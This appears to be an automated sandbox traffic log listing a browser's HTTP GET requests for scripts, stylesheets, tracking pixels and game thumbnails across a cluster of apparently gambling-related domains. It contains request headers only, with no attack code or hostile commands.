Source: global trafficHTTP traffic detected: GET /ftl/commonPage/js/websocket/Comet.js HTTP/1.1Host: brhrjf.yuhu06.xyzConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://x551005.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: wns732.ccConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ftl/commonPage/js/websocket/CometMarathon.js HTTP/1.1Host: brhrjf.yuhu06.xyzConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://x551005.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cc.png?r=7134333617 HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: wns732.ccConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wns732.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: com_env=p
Source: global trafficHTTP traffic detected: GET /pc/public/vendor.dll.js HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://hg679.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/lib/jquery.min-1.9.1.js HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://hg679.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /zb-cloud/stat.do?pv=ajax&pa=host.info&domain=hg679.cc&terminal=1&r=6412591773 HTTP/1.1Host: ahd-ocssn.qqxgo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /lt-cloud/stat.do?pv=ajax&pa=host.info&domain=xpj723.cc&withAgentCode=1&withSettings=1&terminal=1&ts=17972850573425 HTTP/1.1Host: ocsapi1961.hydqef.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /default.html HTTP/1.1Host: xpj723.ccConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://xpj723.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: com_env=p
Source: global trafficHTTP traffic detected: GET /ftl/commonPage/js/websocket/PopUp.js HTTP/1.1Host: brhrjf.yuhu06.xyzConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://x551005.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cc.png?r=6084701866 HTTP/1.1Host: zb1-hw.qectyoua.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ftl/commonPage/themes/gui-base.css HTTP/1.1Host: 8vpfnx.eveday.meConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://e933002.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ftl/commonPage/themes/gui-skin-default.css HTTP/1.1Host: 8vpfnx.eveday.meConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://e933002.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ftl/bwin1768/themes/style/common.css HTTP/1.1Host: 8vpfnx.eveday.meConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://e933002.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ftl/commonPage/js/lazyload.js HTTP/1.1Host: brhrjf.yuhu06.xyzConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://x551005.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/image-pc/video/mg_h.jpg HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://zb-hw.czwygs.com/pc/240516-03/static/css/t4091.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cc.png?r=8877277658 HTTP/1.1Host: zb-qq.gzjqwlkj.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ocs/cc.png?1717972852372 HTTP/1.1Host: ocsapi1961.hydqef.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://wns732.ccSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://wns732.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/image-pc/video/dg_h.jpg HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://zb-hw.czwygs.com/pc/240516-03/static/css/t4091.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/image-pc/video/allbet_h.jpg HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://zb-hw.czwygs.com/pc/240516-03/static/css/t4091.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/image-pc/video/ag_h.jpg HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://zb-hw.czwygs.com/pc/240516-03/static/css/t4091.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: wns732.ccConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: com_env=p
Source: global trafficHTTP traffic detected: GET /zb-cloud/stat.do?pv=ajax&pa=host.info&domain=hg679.cc&terminal=1&r=6412591773 HTTP/1.1Host: ocsapi-lc.tingmeikj.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/image-pc/video/og_h.jpg HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://zb-hw.czwygs.com/pc/240516-03/static/css/t4091.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/image-pc/video/gd_h.jpg HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://zb-hw.czwygs.com/pc/240516-03/static/css/t4091.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /message_zh_CN.js?v=1717580749344 HTTP/1.1Host: x551005.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://x551005.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ftl/commonPage/js/gui-base.js HTTP/1.1Host: brhrjf.yuhu06.xyzConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://x551005.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ocs/zbw?r=5552162052 HTTP/1.1Host: ocsapi1961.hydqef.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://xpj723.ccSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://xpj723.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/image-pc/video/pt_h.jpg HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://zb-hw.czwygs.com/pc/240516-03/static/css/t4091.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/image-pc/video/mg_h.jpg HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ftl/commonPage/js/bootstrap-dialog.min.js HTTP/1.1Host: brhrjf.yuhu06.xyzConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://x551005.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ftl/bwin1768/themes/style/bootstrap-dialog.min.css HTTP/1.1Host: 8vpfnx.eveday.meConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://e933002.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ftl/commonPage/themes/hb/css/pc.css HTTP/1.1Host: 8vpfnx.eveday.meConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://e933002.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /061410/rcenter/common/static/css/gb.validation.min.css HTTP/1.1Host: 8vpfnx.eveday.meConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://e933002.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/image-pc/video/sunbet_h.jpg HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://zb-hw.czwygs.com/pc/240516-03/static/css/t4091.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/image-pc/video/gc_h.jpg HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://zb-hw.czwygs.com/pc/240516-03/static/css/t4091.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/image-pc/video/allbet_h.jpg HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/image-pc/video/bbin_h.jpg HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://zb-hw.czwygs.com/pc/240516-03/static/css/t4091.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/image-pc/video/dg_h.jpg HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/image-pc/video/ag_h.jpg HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ocs/cc.png?1717972852372 HTTP/1.1Host: ocsapi1961.hydqef.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cc.png?r=9636637722 HTTP/1.1Host: zb1-hw.qectyoua.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://xpj723.ccSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://xpj723.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cc.png?r=8690266696 HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://xpj723.ccSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://xpj723.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/image-pc/video/og_h.jpg HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/image-pc/video/lebo_h.jpg HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://zb-hw.czwygs.com/pc/240516-03/static/css/t4091.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
